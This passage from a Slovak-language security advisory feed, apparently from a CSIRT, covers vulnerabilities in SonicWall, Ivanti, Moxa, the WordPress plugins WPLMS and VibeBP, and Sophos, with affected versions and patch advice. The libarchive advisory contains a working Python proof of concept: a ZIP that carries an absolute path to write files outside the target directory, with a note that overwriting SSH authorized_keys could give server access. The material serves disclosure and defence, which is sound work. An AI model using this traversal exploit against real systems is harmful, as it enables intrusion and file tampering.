<p><strong>Spoločnosť SonicWall vydala bezpečnostné aktualizácie pre svoje firewally s&nbsp;operačným systémom SonicOS, ktoré opravujú 4 vysoko závažné zraniteľnosti. Najzávažnejšiu zraniteľnosť s označením CVE-2024-53704 možno zneužiť na obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu do systému. Ostatné zraniteľnosti možno zneužiť na obídenie mechanizmov autentifikácie, realizáciu SSRF útokov a eskaláciu privilégií.</strong></p>



<p><strong>[Aktualizácia: 13.2.2025]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Hardware firewally Gen6 (SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650, NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250, SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W) so SonicOS verziách 6.5.4.15-117n a starších</li>



<li>Network Security Virtual firewally Gen7 (NSv 270, NSv 470, NSv 870, vrátane cloudových verzií pre AWS a Azure) so SonicOS verziách 7.0.1-5161 a&nbsp;starších, 7.1.1-7058 a&nbsp;starších a&nbsp;verzii 7.1.2-7019</li>



<li>Firewally Gen7 (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700,NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700) so SonicOS verziách 7.0.1-5161 a&nbsp;starších, 7.1.1-7058 a&nbsp;starších a&nbsp;verzii 7.1.2-7019</li>



<li>NGFW Firewally TZ80 so SonicOS verzie 8.0.0-8035</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-53704 </strong>(CVSS skóre 8,2)</p>



<p>Nedostatočnú implementáciu mechanizmov autentifikácie v&nbsp;rámci komponentu SSLVPN by vzdialený neautentifikovaný útočník mohol zneužiť zaslaním špeciálne vytvoreného session cookie na prebratie aktívnych SSL VPN relácií a získanie neoprávneného prístupu do siete.<br><em>[Aktualizácia 13.2.2025]:</em> <em>Bezpečnostní výskumníci zo spoločnosti BISHOP FOX zverejnili pre zraniteľnosť exploit</em>.<em> Je teda možné očakávať pokusy o cielené zneužívanie zraniteľnosti</em>.</p>



<p><strong>CVE-2024-53706 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť vo funkcii SSH Config by vzdialený autentifikovaný útočník mohol zneužiť na eskaláciu privilégií na úroveň používateľa root a&nbsp;následné vykonanie škodlivého kódu.</p>



<p><strong>CVE-2024-40762 </strong>(CVSS skóre 7,1)</p>



<p>Generátor autentifikačných tokenov v SSLVPN využíva kryptograficky slabý generátor pseudonáhodných čísel, čo by vzdialený neautentifikovaný útočník mohol zneužiť na predikciu tokenov a&nbsp;získanie neoprávneného prístupu do systému.</p>



<p><strong>CVE-2024-53705 </strong>(CVSS skóre 6,5)</p>



<p>Bližšie nešpecifikovanú zraniteľnosť v&nbsp;manažmentom rozhraní SSH možno zneužiť na realizáciu útokov SSRF (Server Side Request Forgery) a&nbsp;vytvoriť TCP pripojenie na ľubovoľný port.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť SonicWall odporúča vykonať bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verzie:</p>



<ul>
<li>Gen 6 / 6.5 hardware firewalls: SonicOS 6.5.5.1-6n</li>



<li>Gen 6 / 6.5 NSv firewalls: SonicOS 6.5.4.v-21s-RC2457</li>



<li>Gen 7 a&nbsp;Gen 7 NSv firewalls: SonicOS 7.0.1-5165; 7.1.3-7015</li>



<li>TZ80: SonicOS 8.0.0-8037</li>
</ul>



<p>Výrobca taktiež odporúča limitovať prístup k&nbsp;manažmentovým rozhraniam firewallov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003">https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/sonicwall-urges-admins-to-patch-exploitable-sslvpn-bug-immediately/">https://www.bleepingcomputer.com/news/security/sonicwall-urges-admins-to-patch-exploitable-sslvpn-bug-immediately/</a></li>



<li><a href="https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking">https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1892/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť v produktoch Ivanti ICS, IPS a Neurons for ZTA gateways</title>
		<link>/posts/1890</link>
					<comments>/posts/1890#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 Jan 2025 16:05:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1890</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 2 bezpečnostné zraniteľnosti v produktoch Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a Ivanti...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 2 bezpečnostné zraniteľnosti v produktoch Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a Ivanti Neurons for ZTA gateways, z čoho 1 je označená ako kritická. CVE-2025-0282 možno zneužiť na vzdialené vykonanie kódu. Druhú zraniteľnosť možno zneužiť na eskaláciu privilégií.</strong></p>



<p><strong>[Aktualizácia: 17.2.2025]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Connect Secure vo verziách 22.7R2 až 22.7R2.4</li>



<li>Ivanti Policy Secure vo verziách 22.7R1 až 22.7R1.2</li>



<li>Ivanti Neurons for ZTA gateways vo verziách 22.7R2 až 22.7R2.3</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-0282 </strong>(CVSS skóre 9,0)</p>



<p>Kritická zraniteľnosť spočíva v pretečení zásobníka a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu.</p>



<p>CVE-2025-0282 je v súčasnosti aktívne zneužívaná na kompromitáciu Ivanti Connect Secure a následnú inštaláciu malvéru. Zneužitie zraniteľnosti možno na zariadeniach overiť prostredníctvom nástroja ICT (Integrity Checker Tool).</p>



<p><em>[Aktualizácia 17.2.2025]<br>JPCERT/CC zverejnil informácie, že zraniteľnosť CVE-2025-0282 je v súčasnosti aktívne zneužívaná na šírenie malwarového frameworku SPAWNCHIMERA. Tento framework kombinuje funkcionality malvéru SPAWNANT, SPAWNMOLE a SPAWNNAIL a obsahuje aj funkciu brániacu ďalšiemu zneužitiu zraniteľnosti, čím bráni opätovnej infekcii zo strany iných aktérov.</em></p>



<p><strong>CVE-2025-0283 </strong>(CVSS skóre 7,0)</p>



<p>Vysoko závažná zraniteľnosť spočívajúcu v&nbsp;pretečení zásobníka by lokálny autentifikovaný útočník mohol zneužiť na eskaláciu privilégií.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len verzie s&nbsp;platnou technickou podporou a&nbsp;vykonať bezodkladnú aktualizáciu zasiahnutých systémov.</p>



<p>Aktualizácie pre produkt Ivanti Connect Secure (verzia 22.7R2.5) sú už dostupné na stiahnutie. Pred vykonaním aktualizácie výrobca odporúča preskúmať integritu zariadenia prostredníctvom ICT (Integrity Checker Tool) a&nbsp;vykonať preventívnu obnovu továrenských nastavení.</p>



<p>Aktualizácie pre produkty Ivanti Policy Secure a&nbsp;Ivanti Neurons for ZTA sú naplánované na 21.01.2025.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.ivanti.com/blog/security-update-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways">https://www.ivanti.com/blog/security-update-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-connect-secure-flaw-used-in-zero-day-attacks/">https://www.bleepingcomputer.com/news/security/ivanti-warns-of-new-connect-secure-flaw-used-in-zero-day-attacks/</a></li>



<li><a href="https://www.jpcert.or.jp/at/2025/at250001.html">https://www.jpcert.or.jp/at/2025/at250001.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1890/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti routerov a sieťových zariadení Moxa</title>
		<link>/posts/1885</link>
					<comments>/posts/1885#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 08 Jan 2025 14:16:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Moxa]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1885</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/moxa-inc-vector-logo.png" alt="" /></p>Spoločnosť Moxa vydala bezpečnostné aktualizácie svojich priemyselných routerov a sieťového príslušenstva, ktoré opravujú dve zraniteľnosti, z ktorých jedna je označená...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/moxa-inc-vector-logo.png" alt="" /></p>
<p><strong>Spoločnosť Moxa vydala bezpečnostné aktualizácie svojich priemyselných routerov a sieťového príslušenstva, ktoré opravujú dve zraniteľnosti, z ktorých jedna je označená ako kritická. CVE-2024-9140 by vzdialený útočník mohol zneužiť na injekciu príkazov a vzdialené vykonanie škodlivého kódu a CVE-2024-9138 by útočník mohol zneužiť na eskaláciu privilégií na úroveň používateľa root.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>EDR-810 Series, firmware 5.12.37 a staršie</li>



<li>EDR-8010 Series, firmware 3.13.1 a&nbsp;staršie</li>



<li>EDR-G902 Series, firmware 5.7.25 a staršie</li>



<li>EDR-G903 Series, firmware 5.7.25 a staršie</li>



<li>EDR-G9004 Series, firmware 3.13.1 a staršie</li>



<li>EDR-G9010 Series, firmware 3.13.1 a staršie</li>



<li>EDF-G1002-BP Series, firmware 3.13.1 a staršie</li>



<li>NAT-102 Series, firmware 1.0.5 a staršie</li>



<li>OnCell G4302-LTE4 Series, firmware 3.13 a staršie</li>



<li>TN-4900 Series, firmware 3.13 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-9138</strong> (CVSS 4.0 skóre 8,6)</p>



<p>Zraniteľnosť spočíva v existencii zabudovaných prihlasovacích údajov, ktoré by autentifikovaný útočník mohol zneužiť na eskaláciu privilégií na úroveň používateľa root.</p>



<p><strong>CVE-2024-9140 </strong>(CVSS 4.0 skóre 9,3)</p>



<p>Zraniteľnosť spočíva v nedostatočnej kontrole používateľských vstupov a vzdialený neautorizovaný útočník by ju mohol zneužiť na injekciu systémových príkazov a vzdialené vykonanie škodlivého kódu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verziu:</p>



<ul>
<li>EDR-810 Series, firmware 3.14</li>



<li>EDR-8010 Series, firmware 3.14</li>



<li>EDR-G902 Series, firmware 3.14</li>



<li>EDR-G903 Series, firmware 3.14</li>



<li>EDR-G9004 Series, firmware 3.14</li>



<li>EDR-G9010 Series, firmware 3.14</li>



<li>EDF-G1002-BP Series, firmware 3.14</li>



<li>NAT-102 Series – aktuálne nie je záplata dostupná</li>



<li>OnCell G4302-LTE4 Series – záplatu poskytne technická podpora Moxa</li>



<li>TN-4900 Series, firmware 3.14</li>
</ul>



<p>Mitigovať zraniteľnosti spoločnosť Moxa odporúča limitovaním sieťového prístupu k predmetným zariadeniam, povolením prístupu cez SSH len pre dôveryhodné IP adresy a nasadením prvkov IDS a IPS.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9138">https://nvd.nist.gov/vuln/detail/CVE-2024-9138</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9140">https://nvd.nist.gov/vuln/detail/CVE-2024-9140</a></li>



<li><a href="https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241155-privilege-escalation-and-os-command-injection-vulnerabilities-in-cellular-routers,-secure-routers,-and-netwo">https://www.moxa.com/en/support/product-support/security-advisory/mpsa-241155-privilege-escalation-and-os-command-injection-vulnerabilities-in-cellular-routers,-secure-routers,-and-netwo</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/vulnerable-moxa-devices-expose-industrial-networks-to-attacks/">https://www.bleepingcomputer.com/news/security/vulnerable-moxa-devices-expose-industrial-networks-to-attacks/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1885/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť knižnice Python libarchive umožňuje Directory Traversal</title>
		<link>/posts/1882</link>
					<comments>/posts/1882#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 07 Jan 2025 12:33:33 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Python libarchive]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1882</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/01/Python-1024x674.png" alt="" /></p>Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť v&#160;Python knižnici libarchive, ktorá umožňuje vykonávať útoky typu directory traversal. Zraniteľné systémy: Vyššie uvedená verzia...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/01/Python-1024x674.png" alt="" /></p>
<p><strong>Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť v&nbsp;Python knižnici libarchive, ktorá umožňuje vykonávať útoky typu directory traversal.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>libarchive – 4.2.1</li>
</ul>



<p><em>Vyššie uvedená verzia bola otestovaná. Nemôžeme vylúčiť, že zraniteľné sú aj staršie verzie.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-55587</strong></p>



<p>Zraniteľnosť sa nachádza v&nbsp;najnovšej verzii knižnice <em>libarchive</em> (4.2.1) a&nbsp;súvisí s&nbsp;absenciou ošetrovania názvov súborov nachádzajúcich sa v&nbsp;poskytnutom súbore ZIP. Táto zraniteľnosť sa nachádza v&nbsp;triede <em>ZipFile</em> v&nbsp;metódach <em>extract</em> a&nbsp;<em>extractall</em>. V&nbsp;prípade, že názvy súborov v&nbsp;nahranom súbore ZIP obsahujú relatívnu cestu (../) alebo aj absolútnu cestu (/tmp/test.txt) je možné danú zraniteľnosť zneužiť nasledovným spôsobom.</p>



<p>Keď napríklad vytvoríme súbor ZIP pomocou nasledovného Python kódu:</p>



<p><code>import pyzipper<br>import time<br>with pyzipper.ZipFile("<strong>exploit.zip</strong>", 'w', compression=pyzipper.ZIP_LZMA) as zf:<br>    current_time = time.localtime(time.time())[:6]<br>    zip_info = zf.zipinfo_cls(filename="<strong>/tmp/vulnerable.txt</strong>",  date_time=current_time)<br>    zf.writestr(zip_info, "vulnerable")</code></p>



<p>Vytvorí sa nám súbor ZIP s&nbsp;názvom <em>exploit.zip</em> obsahujúci jediný súbor s&nbsp;názvom <em>/tmp/vulnerable.txt</em>.</p>



<p>Keď následne tento súbor extrahujeme za pomoci zraniteľnej metódy <em>extractall</em>:</p>



<p><code>from libarchive.zip import ZipFile<br><br>with ZipFile("<strong>exploit.zip</strong>",  mode="r") as archive:<br>    archive.extractall(path="./")</code></p>



<p>V&nbsp;adresári <em>/tmp</em> sa nám vytvorí súbor s&nbsp;názvom <em>vulnerable.txt</em>, ktorý bude obsahovať text „vulnerable“.</p>



<p>Táto zraniteľnosť sa nachádza v&nbsp;súbore <em>libarchive/zip.py</em> na riadku 107:</p>



<p><code>return self.readpath(name, os.path.join(path, name))</code></p>



<p>kde premenná <em>name </em>nie je ošetrovaná. Vzhľadom na správanie metódy <em>join</em> v&nbsp;module <em>path</em>&nbsp;knižnice <em>os</em> teda novou cestou bude posledná zadaná absolútna cesta, t.j. nami zadaný názov súboru <em>/tmp/vulnerable.txt</em>.<br>Zneužitím danej zraniteľnosti môže dôjsť napríklad ku získaniu prístupu na server prepísaním súboru <em>authorized_keys</em>, nachádzajúceho sa v&nbsp;podpriečinku <em>.ssh</em> domovského priečinku používateľa.</p>



<p>Zraniteľnosť bola overovaná s použitím&nbsp;nasledujúcich verzií knižníc:</p>



<ul>
<li>libarchive – 4.2.1</li>
</ul>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Prepísanie citlivých súborov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Pokiaľ pri vývoji webovej aplikácie v Python využívate knižnicu <em>libarchive</em> a používate metódu <em>extract</em> alebo <em>extractall</em> s použitím súboru ZIP, ktorý poskytol požívateľ, odporúčame zvážiť zmenu používanej knižnice na modernejšie alternatívy ako napríklad <em>pyzipper</em>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-55587">https://nvd.nist.gov/vuln/detail/CVE-2024-55587</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1882/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v moduloch WordPress WPLMS a VibeBP</title>
		<link>/posts/1867</link>
					<comments>/posts/1867#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 31 Dec 2024 12:57:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1867</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Vývojári modulov WordPress WPLMS a VibeBP vydali bezpečnostné aktualizácie, ktoré opravujú 18 zraniteľností, z ktorých 7 je označených ako kritických....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Vývojári modulov WordPress WPLMS a VibeBP vydali bezpečnostné aktualizácie, ktoré opravujú 18 zraniteľností, z ktorých 7 je označených ako kritických. Kritické zraniteľnosti vo WPLMS možno zneužiť na nahranie súborov na server, vzdialené vykonanie kódu, eskaláciu privilégií a&nbsp;získanie úplnej kontroly nad systémom. Kritické zraniteľnosti vo VibeBP možno zneužiť na realizáciu SQL injekcie, eskaláciu privilégií z&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin WPLMS vo verziách starších ako 1.9.9.5.3</li>



<li>WordPress plugin VibeBP vo verziách starších ako 1.9.9.7.7</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>WPLMS:</u></strong></p>



<p><strong>CVE-2024-56046 </strong>(CVSS skóre 10,0)<strong>, CVE-2024-56050, CVE-2024-56052 </strong>(CVSS skóre 9,9)</p>



<p>Bližšie nešpecifikované zraniteľnosti by vzdialený neautentifikovaný (CVE-2024-56046) či autentifikovaný útočník mohol zneužiť na nahranie ľubovoľných súborov na server, vykonanie škodlivého kódu a&nbsp;získanie úplnej kontroly nad systémom.</p>



<p><strong>CVE-2024-56043 </strong>(CVSS skóre 9,8)</p>



<p>Kritickú zraniteľnosť by vzdialený neautentifikovaný používateľ mohol zneužiť na eskaláciu privilégií a získanie úplnej kontroly nad systémom.</p>



<p><strong>CVE-2024-56042 </strong>(CVSS skóre 9,3)</p>



<p>Zraniteľnosť umožňuje prostredníctvom SQL injekcie získať neoprávnený prístup do databázy redakčného systému, získanie citlivých údajov a vykonanie neoprávnených zmien v&nbsp;systéme.</p>



<p><strong><u>VibeBP:</u></strong></p>



<p><strong>CVE-2024-56040 </strong>(CVSS skóre 9,8)</p>



<p>Kritickú zraniteľnosť by vzdialený neautentifikovaný používateľ mohol zneužiť na eskaláciu privilégií a&nbsp;získanie úplnej kontroly nad systémom.</p>



<p><strong>CVE-2024-56039 </strong>(CVSS skóre 9,3)</p>



<p>CVE-2024-56039 spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov a&nbsp;možno ju prostredníctvom SQL injekcie zneužiť na získanie neoprávneného prístupu do databázy, získanie citlivých údajov a&nbsp;vykonanie neoprávnených zmien v systéme.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácie zásuvného modulu WPLMS na verziu 1.9.9.5.3 a VibeBP na verziu 1.9.9.7.7.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wplms-and-vibebp-plugins/">https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wplms-and-vibebp-plugins/</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-unauthenticated-arbitrary-file-upload-vulnerability">https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-unauthenticated-arbitrary-file-upload-vulnerability</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-arbitrary-file-upload-vulnerability">https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-3-subscriber-arbitrary-file-upload-vulnerability</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-student-arbitrary-file-upload-vulnerability">https://patchstack.com/database/wordpress/plugin/wplms-plugin/vulnerability/wordpress-wplms-plugin-1-9-9-5-2-student-arbitrary-file-upload-vulnerability</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/vibebp/vulnerability/wordpress-vibebp-plugin-1-9-9-4-1-unauthenticated-privilege-escalation-vulnerability">https://patchstack.com/database/wordpress/plugin/vibebp/vulnerability/wordpress-vibebp-plugin-1-9-9-4-1-unauthenticated-privilege-escalation-vulnerability</a></li>



<li><a href="https://patchstack.com/database/wordpress/plugin/vibebp/vulnerability/wordpress-vibebp-plugin-1-9-9-7-7-unauthenticated-sql-injection-vulnerability">https://patchstack.com/database/wordpress/plugin/vibebp/vulnerability/wordpress-vibebp-plugin-1-9-9-7-7-unauthenticated-sql-injection-vulnerability</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/premium-wplms-wordpress-plugins-address-seven-critical-flaws/">https://www.bleepingcomputer.com/news/security/premium-wplms-wordpress-plugins-address-seven-critical-flaws/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1867/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti vo firewalloch Sophos</title>
		<link>/posts/1861</link>
					<comments>/posts/1861#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 31 Dec 2024 12:53:46 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Sophos]]></category>
		<guid isPermaLink="false">/?p=1861</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Sophos-Logo-1024x659.jpg" alt="" /></p>Spoločnosť Sophos vydala bezpečnostné aktualizácie pre svoje firewally, ktoré opravujú tri zraniteľnosti, z ktorých dve sú označení ako kritické. CVE-2024-12727...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Sophos-Logo-1024x659.jpg" alt="" /></p>
<p><strong>Spoločnosť Sophos vydala bezpečnostné aktualizácie pre svoje firewally, ktoré opravujú tri zraniteľnosti, z ktorých dve sú označení ako kritické. CVE-2024-12727 a CVE-2024-12728 možno zneužiť na získanie neoprávneného prístupu do systému a&nbsp;vzdialené vykonanie kódu. Poslednú zraniteľnosť možno zneužiť na injekciu príkazov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Sophos Firewall vo verziách 21.0 GA (21.0.0) a starších</li>
</ul>



<p><strong>Pozn.: Zraniteľnosti sú automaticky opravené na zariadeniach s&nbsp;aktivovanou funkciou pre automatickú inštaláciu bezpečnostných záplat (Allow automatic installation of hotfixes).</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-12727 </strong>(CVSS skóre 9,8)</p>



<p>CVE-2024-12727 vo funkcionalite pre ochranu e-mailov by vzdialený neautentifikovaný útočník prostredníctvom SQL injekcie mohol zneužiť na získanie <strong>neoprávneného prístupu k&nbsp;internej databáze firewallu</strong> a následne na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Zraniteľnosť je možné zneužiť na firewalloch bežiacich v&nbsp;režime HA (High Availability), na ktorých je aktivovaná funkcia SPX (Secure PDF eXchange).</strong></p>



<p><strong>CVE-2024-12728 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;chybnom mechanizme pre generovanie SSH hesla používaného pri inicializácii zapojenia firewallu do HA (High Availability) klastra, ktoré zostáva aktívne aj po dokončení inicializačného procesu a možno ho zneužiť na <strong>získanie neoprávneného prístupu do systému.</strong></p>



<p><strong>CVE-2024-12729 </strong>(CVSS skóre 8,8)</p>



<p>CVE-2024-12729 v komponente User Portal by vzdialený autentifikovaný útočník mohol zneužiť na <strong>injekciu príkazov</strong> a&nbsp;<strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Zraniteľnosti sú automaticky opravené na firewalloch s aktivovanou funkciou pre automatickú inštaláciu bezpečnostných záplat (Allow automatic installation of hotfixes). Administrátori môžu úspešnú inštaláciu hotfixov overiť prostredníctvom postupu uvedeného na </strong><a href="https://support.sophos.com/support/s/article/KBA-000010084?language=en_US"><strong>stránke spoločnosti Sophos</strong></a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.sophos.com/en-us/security-advisories/sophos-sa-20241219-sfos-rce">https://www.sophos.com/en-us/security-advisories/sophos-sa-20241219-sfos-rce</a></li>



<li><a href="https://support.sophos.com/support/s/article/KBA-000010084">https://support.sophos.com/support/s/article/KBA-000010084</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-12727">https://nvd.nist.gov/vuln/detail/CVE-2024-12727</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-12728">https://nvd.nist.gov/vuln/detail/CVE-2024-12728</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-12729">https://nvd.nist.gov/vuln/detail/CVE-2024-12729</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/sophos-discloses-critical-firewall-remote-code-execution-flaw/">https://www.bleepingcomputer.com/news/security/sophos-discloses-critical-firewall-remote-code-execution-flaw/</a></li>
</ul>
]]></content:encoded>
					
